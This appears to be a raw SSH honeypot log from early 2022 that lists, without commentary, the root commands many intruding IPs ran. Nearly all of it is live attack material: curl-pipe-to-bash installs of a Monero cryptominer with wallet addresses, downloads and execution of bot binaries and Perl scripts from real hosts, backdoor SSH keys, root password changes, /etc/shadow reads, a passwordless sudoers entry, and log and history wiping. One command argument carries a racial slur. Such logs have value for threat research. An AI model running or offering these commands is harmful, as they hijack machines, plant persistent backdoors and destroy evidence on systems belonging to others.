Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 45.148.10.163 20-Jan-2022 12:20:26 ssh2 root
Exec pkill java; pkill Xorg; pkill x11vnc; pkill cnrig; pkill xmrig; pkill screen; pkill zmap; pkill brrr; pkill x86; pkill monero; pkill x86_64; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:alolera12345 | chpasswd
pkill java
pkill Xorg
pkill x11vnc
pkill cnrig
pkill xmrig
pkill screen
pkill zmap
pkill brrr
pkill x86
pkill monero
pkill x86_64
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:alolera12345 | chpasswd

From 45.148.10.163 20-Jan-2022 15:00:00 ssh2 root
Exec pkill java; pkill Xorg; pkill x11vnc; pkill cnrig; pkill xmrig; pkill screen; pkill zmap; pkill brrr; pkill x86; pkill monero; pkill x86_64; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:alolera12345 | chpasswd
pkill java
pkill Xorg
pkill x11vnc
pkill cnrig
pkill xmrig
pkill screen
pkill zmap
pkill brrr
pkill x86
pkill monero
pkill x86_64
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:alolera12345 | chpasswd

From 147.182.196.61 20-Jan-2022 21:19:47 ssh2 root
Exec sudo hive-passwd sjdgisidjgjisejirw4g; sudo pkill Xorg; sudo pkill x11vnc; sudo service shellinabox stop; cat /hive-config/rig.conf; hostname
sudo hive-passwd sjdgisidjgjisejirw4g
sudo pkill Xorg
sudo pkill x11vnc
sudo service shellinabox stop
cat /hive-config/rig.conf
hostname

From 43.154.198.116 21-Jan-2022 03:46:11 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt;perl /tmp/dred.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt
perl /tmp/dred.txt
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt;perl /tmp/dred.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt
perl /tmp/dred.txt

From 43.154.198.116 21-Jan-2022 03:46:12 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt;perl /tmp/dred.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt
perl /tmp/dred.txt

From 159.89.164.146 21-Jan-2022 07:00:43 ssh2 root
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 179.43.187.70 21-Jan-2022 11:39:28 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/1a9zxq/7ega.x86; cat 7ega.x86 > x86; chmod +x x86; chmod 777 *; ./x86 rooted.x86; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.187.99/1a9zxq/7ega.x86
cat 7ega.x86 > x86
chmod +x x86
chmod 777 *
./x86 rooted.x86
history -c

From 179.43.187.70 21-Jan-2022 11:42:14 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/cometome; cat cometome > rooted; chmod +x rooted; chmod 777 *; ./rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.187.99/cometome
cat cometome > rooted
chmod +x rooted
chmod 777 *
./rooted
history -c

From 52.83.131.72 23-Jan-2022 02:47:55 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu

From 50.212.157.1 23-Jan-2022 14:25:02 ssh2 root
w
lscpu

From 137.117.73.142 24-Jan-2022 12:34:02 ssh2 root
Exec uname -a;nproc
uname -a
nproc

From 159.89.155.205 25-Jan-2022 00:15:31 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec unset HISTFILE ; unset HISTSIZE
unset HISTFILE
unset HISTSIZE

From 193.112.9.233 25-Jan-2022 02:22:34 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~

From 35.235.78.51 25-Jan-2022 02:31:54 ssh2 root
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 107.189.31.191 25-Jan-2022 07:48:16 ssh2 root
Exec uname -a
uname -a
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 78.5.68.102 25-Jan-2022 11:52:04 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 35.235.78.51 25-Jan-2022 12:43:30 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
uname -a
cd /tmp
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 69.176.89.80 26-Jan-2022 11:48:16 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt;perl /tmp/dred2.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt
perl /tmp/dred2.txt

From 189.242.159.177 27-Jan-2022 02:22:17 ssh2 root
Exec echo -n NZAWCH8S|md5sum
echo -n NZAWCH8S|md5sum

From 173.249.11.42 28-Jan-2022 12:18:15 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r
Exec uname -s -v -n -r
uname -s -v -n -r
Exec uname -s -v -n -r
uname -s -v -n -r

From 173.249.11.42 28-Jan-2022 12:26:58 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r
Exec uname -s -v -n -r
uname -s -v -n -r

From 173.249.11.42 28-Jan-2022 12:28:18 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r

From 209.141.48.248 29-Jan-2022 17:08:32 ssh2 root
Exec cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /;rm -rf a.sh; wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh; chmod 777 a.sh; nohup ./a.sh &
cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /
rm -rf a.sh
wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh
chmod 777 a.sh
nohup ./a.sh

From 209.141.48.248 29-Jan-2022 17:08:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /;rm -rf a.sh; wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh; chmod 777 a.sh; nohup ./a.sh &
cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /
rm -rf a.sh
wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh
chmod 777 a.sh
nohup ./a.sh
Exec cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /;rm -rf a.sh; wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh; chmod 777 a.sh; nohup ./a.sh &
cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /
rm -rf a.sh
wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh
chmod 777 a.sh
nohup ./a.sh

From 193.169.252.71 31-Jan-2022 22:58:51 ssh2 root
Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ;  touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /var/log/wtmp
rm -rf /var/log/lastlog
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
rm -rf /root/.bash_history
touch /root/.bash_history
history -r

From 193.169.252.71 31-Jan-2022 23:46:21 ssh2 root
Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ;  touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /var/log/wtmp
rm -rf /var/log/lastlog
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
rm -rf /root/.bash_history
touch /root/.bash_history
history -r

From 49.232.131.73 1-Feb-2022 21:17:03 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 103.145.148.138 1-Feb-2022 21:17:40 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 209.97.182.205 1-Feb-2022 21:18:16 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig

From 209.97.182.205 1-Feb-2022 21:18:16 ssh2 root
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 1.220.98.197 1-Feb-2022 21:18:57 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 58.247.202.150 1-Feb-2022 21:39:24 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 80.147.162.151 1-Feb-2022 22:21:19 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 123.207.26.100 1-Feb-2022 22:36:55 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 62.233.50.127 7-Feb-2022 05:29:07 ssh2 root
Exec uname -a;cd /tmp;wget ftp://cpa:cpa@5.45.119.175/max.txt;perl max.txt;rm -rf max.*;history -c;clear
uname -a
cd /tmp
wget ftp://cpa:cpa@5.45.119.175/max.txt
perl max.txt
rm -rf max.*
history -c
clear

From 112.65.206.11 7-Feb-2022 09:27:40 ssh2 root
Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://mangocorner.com.sg/img/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://mangocorner.com.sg/img/ns2.jpg|perl;wget http://mangocorner.com.sg/img/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon
uname -a
id
cat /etc/shadow /etc/passwd
lscpu
chattr -ia /root/.ssh/*
wget http://mangocorner.com.sg/img/ns1.jpg -O ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
wget -qO - http://mangocorner.com.sg/img/ns2.jpg|perl
wget http://mangocorner.com.sg/img/ns3.jpg -O /tmp/x
chmod +x /tmp/x
/tmp/x
mv /tmp/x /tmp/o
/tmp/o
rm -f /tmp/o
mkdir /sbin/.ssh
cp ~/.ssh/authorized_keys /sbin/.ssh
chown daemon.daemon /sbin/.ssh /sbin/.ssh/*
chmod 700 /sbin/.ssh
chmod 600 /sbin/.ssh/authorized_keys
echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
chsh -s /bin/sh daemon

From 51.15.11.198 7-Feb-2022 23:55:35 ssh2 root
Exec unset HISTFILE ; unset HISTSIZE
unset HISTFILE
unset HISTSIZE

From 194.163.167.5 11-Feb-2022 19:48:26 ssh2 root
Exec cd /tmp/; wget 179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed
cd /tmp/
wget 179.43.175.83/x86_64
chmod 777 x86_64
./x86_64 x86xhed

From 93.95.230.96 12-Feb-2022 09:49:31 ssh2 root
Exec nproc
nproc

From 179.43.170.173 12-Feb-2022 16:12:23 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 141.98.10.175 12-Feb-2022 22:00:52 ssh2 root
Exec wget 209.141.33.122/x86; chmod 777 x86; ./x86 nigga
wget 209.141.33.122/x86
chmod 777 x86
./x86 nigga

From 179.43.159.3 13-Feb-2022 05:18:17 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47yfXMczghs86YWRp1GQ8rR3mKJMGFnCbcPcbGq484JPfWyuYv5q7rHBzkC1LWtbXnLrKCyqDhqqj6DW4MBp92qtTxcwHk6
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47yfXMczghs86YWRp1GQ8rR3mKJMGFnCbcPcbGq484JPfWyuYv5q7rHBzkC1LWtbXnLrKCyqDhqqj6DW4MBp92qtTxcwHk6

From 141.98.10.175 14-Feb-2022 09:01:13 ssh2 root
Exec wget 209.141.33.122/x86; chmod 777 x86; ./x86 nigga
wget 209.141.33.122/x86
chmod 777 x86
./x86 nigga

From 69.49.224.103 15-Feb-2022 08:46:53 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt;perl /tmp/dred2.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt
perl /tmp/dred2.txt

From 179.43.139.10 15-Feb-2022 11:58:13 ssh2 root
Exec cd /tmp/; wget 179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed
cd /tmp/
wget 179.43.175.83/x86_64
chmod 777 x86_64
./x86_64 x86xhed

From 81.17.24.154 16-Feb-2022 14:54:43 ssh2 root
Exec wget 141.98.10.171/x86; chmod 777 x86; ./x86 nigga
wget 141.98.10.171/x86
chmod 777 x86
./x86 nigga

From 179.43.159.4 18-Feb-2022 23:12:10 ssh2 root
Exec cd /tmp/; rm -rf x86*; wget 179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed
cd /tmp/
rm -rf x86*
wget 179.43.175.83/x86_64
chmod 777 x86_64
./x86_64 x86xhed

From 62.233.50.127 20-Feb-2022 11:52:18 ssh2 root
Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0

From 179.43.168.126 22-Feb-2022 03:02:30 ssh2 root
Exec uname -a; cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytimeDedicated
uname -a
cd /tmp
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://179.43.175.170/putkite/quickr1n.sh
curl -O http://179.43.175.170/putkite/quickr1n.sh
chmod 777 *
sh quickr1n.sh
echo storytimeDedicated

From 36.92.125.163 22-Feb-2022 06:17:06 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 183.77.156.89 22-Feb-2022 06:41:26 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
